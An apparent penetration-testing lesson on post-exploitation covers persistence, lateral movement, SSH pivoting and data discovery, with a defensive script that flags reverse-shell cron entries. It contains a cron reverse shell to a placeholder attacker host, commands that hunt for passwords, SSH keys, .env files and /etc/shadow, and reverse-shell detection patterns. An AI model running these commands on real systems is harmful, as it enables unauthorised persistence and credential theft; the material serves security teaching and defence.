Post-exploitation is what happens after gaining initial access. It demonstrates the true impact of a vulnerability by showing how far an attacker could go. Professional reporting then translates these technical findings into actionable recommendations for the organisation.
| Objective | Description |
|---|---|
| Maintain access | Establish persistent backdoors |
| Escalate privileges | Move from user to administrator/root |
| Lateral movement | Pivot to other systems on the network |
| Data discovery | Find sensitive data, credentials, configurations |
| Data exfiltration | Demonstrate that data can be extracted |
| Cover tracks | Understand how attackers hide their activity |
Tip: In ethical hacking, post-exploitation must stay within the agreed scope. Document everything and avoid unnecessary data access or system modifications.
Persistence ensures continued access if the initial entry point is patched:
| Technique | Platform | Description |
|---|---|---|
| Cron jobs | Linux | Schedule a reverse shell to connect periodically |
| SSH keys | Linux | Add attacker's public key to ~/.ssh/authorized_keys |
| Scheduled tasks | Windows | Use Task Scheduler for persistent execution |
| Registry run keys | Windows | Add entries to auto-start on login |
| Web shells | Web servers | Upload a PHP/ASP shell to the web root |
| Service creation | Windows | Create a service that runs attacker code |
| Startup scripts | Linux | Add commands to .bashrc, .profile, or init scripts |
```bash
# Add a reverse shell that connects every 5 minutes
(crontab -l; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
```
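From the defender's side, the persistence techniques above leave artefacts an auditor can check. The following script, added here as an example and not part of the original lesson, parses a crontab (both five-field and `@reboot`-style entries) and flags commands matching reverse-shell indicators; the indicator list and the sample crontab are constructed for the example.

```python
import re

# Constructed indicator list for this example (not an exhaustive signature set).
REVERSE_SHELL_PATTERNS = [
    r"/dev/tcp/",                                 # bash network redirection
    r"\bbash\s+-i\b",                             # interactive shell bound to a socket
    r"\bnc\b.*\s-e\s",                            # netcat executing a program
    r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b",  # decoded payload piped to a shell
]

def parse_cron_line(line):
    """Return (schedule, command) for a crontab entry, or None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @daily, @hourly, ...
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)                   # five time fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def find_suspicious_cron(lines):
    """Return (schedule, command, indicator) for entries matching a reverse-shell pattern."""
    findings = []
    for schedule, command in filter(None, map(parse_cron_line, lines)):
        hit = next((p for p in REVERSE_SHELL_PATTERNS if re.search(p, command)), None)
        if hit:
            findings.append((schedule, command, hit))
    return findings

# Constructed sample crontab; 203.0.113.10 is from the documentation-only address range.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'",
    "@reboot /usr/local/bin/backup.sh",
    "@hourly sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'",   # payload decodes to 'echo hi'
]

if __name__ == "__main__":
    for schedule, command, indicator in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[{indicator}] {schedule}: {command}")
```

On a real host, feed it the output of `crontab -l` for each user plus the files under `/etc/cron.d` to review every scheduled entry, not just the current user's.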
Moving from a compromised system to other systems on the network:
| Technique | Description | Tools |
|---|---|---|
| Pass the Hash | Use captured NTLM hashes to authenticate | CrackMapExec, Mimikatz |
| Pass the Ticket | Use Kerberos tickets for authentication | Mimikatz, Rubeus |
| PSExec | Remote command execution on Windows | Sysinternals PsExec, Impacket |
| WMI | Windows Management Instrumentation for remote execution | wmiexec |
| SSH pivoting | Tunnel through compromised hosts | SSH port forwarding |
| RDP | Remote desktop to other Windows systems | xfreerdp, rdesktop |
Pivoting uses a compromised host as a bridge to reach otherwise inaccessible networks:
```mermaid
graph LR
A["Attacker Machine"] --> B["Compromised Host (DMZ)<br/>10.0.0.5"]
B --> C["Internal Server<br/>10.10.0.100"]
A -. "Cannot reach 10.10.0.100 directly; pivot through 10.0.0.5" .-> C
```
```bash
# SSH local port forwarding: local port 8080 reaches 10.10.0.100:80 via the DMZ host
ssh -L 8080:10.10.0.100:80 user@10.0.0.5
# SSH dynamic port forwarding (SOCKS proxy on local port 9050)
ssh -D 9050 user@10.0.0.5
# Using proxychains with the SOCKS proxy (TCP connect scan; SYN scans do not traverse a SOCKS proxy)
proxychains nmap -sT -p 80,443 10.10.0.100
```
Find valuable data on compromised systems:
```bash
# Search for configuration files with passwords
grep -r "password" /etc/ /var/www/ /opt/ 2>/dev/null
# Find SSH private keys
find / \( -name "id_rsa" -o -name "id_ed25519" \) 2>/dev/null
# Check for database credentials
cat /var/www/html/.env
cat /var/www/html/wp-config.php
# Read the shadow file (if root)
cat /etc/shadow
```